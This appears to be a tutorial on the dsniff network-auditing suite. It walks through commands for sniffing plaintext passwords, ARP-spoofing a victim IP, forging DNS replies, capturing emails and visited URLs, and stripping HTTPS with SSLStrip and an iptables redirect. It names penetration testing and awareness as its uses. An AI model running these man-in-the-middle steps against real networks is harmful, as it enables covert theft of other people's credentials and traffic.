What is dsniff?
dsniff is a collection of powerful network auditing and penetration testing tools designed for network traffic analysis, sniffing, and interception. It includes utilities for capturing passwords, conducting man-in-the-middle (MITM) attacks, and analyzing network protocols.
Key Tools in the dsniff Suite:
| Tool | Purpose |
|---|---|
| dsniff | Password sniffer for various protocols (HTTP, FTP, IMAP, etc.) |
| arpspoof | ARP spoofing (for MITM attacks) |
| dnsspoof | Forges DNS responses |
| filesnarf | Extracts files from NFS traffic |
| mailsnarf | Captures and reconstructs SMTP emails |
| msgsnarf | Captures instant messaging (AIM, ICQ, etc.) |
| urlsnarf | Logs HTTP requests |
| webspy | Displays visited websites in real-time |
How dsniff Works
dsniff operates by passively or actively intercepting network traffic:
- Passive Sniffing: Captures unencrypted traffic (e.g., HTTP, FTP, Telnet).
- Active Attacks: Uses ARP spoofing (arpspoof) to redirect traffic through an attacker’s machine.
- Protocol Analysis: Parses application-layer data (emails, passwords, URLs).
Installation
dsniff is pre-installed in Kali Linux. If missing, install it via:
Bash
sudo apt update && sudo apt install dsniff -yBasic Usage Examples
A. Sniffing Passwords with dsniff
Bash
sudo dsniff -i eth0- Captures FTP, HTTP, IMAP, and other plaintext credentials.
- Works best in switched networks when combined with ARP spoofing.
B. ARP Spoofing (MITM) with arpspoof
Bash
sudo arpspoof -i eth0 -t 192.168.1.100 192.168.1.1-t: Target IP (victim).192.168.1.1: Router IP.- Enables traffic interception.
C. DNS Spoofing with dnsspoof
Bash
sudo dnsspoof -i eth0- Forges DNS responses to redirect traffic.
- Requires
/etc/hostsentries for spoofed domains.
D. Logging URLs with urlsnarf
Bash
sudo urlsnarf -i eth0- Captures and logs HTTP requests.
E. Email Sniffing with mailsnarf
Bash
sudo mailsnarf -i eth0- Captures SMTP traffic (emails).
Advanced Usage
A. Combining arpspoof + dsniff for MITM
- Enable IP forwarding:
Bash
echo 1 > /proc/sys/net/ipv4/ip_forward- Start ARP spoofing:
Bash
sudo arpspoof -i eth0 -t 192.168.1.100 192.168.1.1- Capture passwords:
Bash
sudo dsniff -i eth0 -w passwords.logB. Spoofing HTTPS Traffic (SSLStrip)
Since dsniff doesn’t handle HTTPS natively, use SSLStrip:
Bash
sudo sslstrip -a -l 8080 -w ssl.logThen redirect traffic:
Bash
sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080C. Real-Time Web Monitoring with webspy
Bash
sudo webspy -i eth0 192.168.1.100- Opens a browser showing victim’s visited sites.
Command-Line Options
Common dsniff Options
| Option | Description |
|---|---|
-i | Specifies network interface (e.g., eth0, wlan0) |
-w | Writes output to a file |
-c | Disables TCP connection reassembly |
-n | Disables IP-to-hostname resolution |
arpspoof Options
| Option | Description |
|---|---|
-i | Network interface |
-t | Victim IP |
-r | Spoof both target and host (bidirectional) |
Real-World Use Cases
- Penetration Testing: Auditing networks for weak protocols (FTP, Telnet).
- Security Awareness: Demonstrating password sniffing risks.
- Incident Response: Detecting ARP spoofing attacks.
- Forensics: Analyzing captured network traffic.
Troubleshooting Tips
Issue: No Traffic Captured
- Solution: Ensure:
- You are on the same network segment.
- ARP spoofing is running (for switched networks).
- IP forwarding is enabled (
echo 1 > /proc/sys/net/ipv4/ip_forward).
Issue: dsniff Not Capturing HTTPS
- Solution: Use SSLStrip or Ettercap for SSL decryption.
Issue: Permission Denied
- Solution: Run with
sudo(requires root privileges).
Issue: ARP Spoofing Fails
- Solution: Disable firewalls (
sudo ufw disable) or check ARP tables (arp -a).
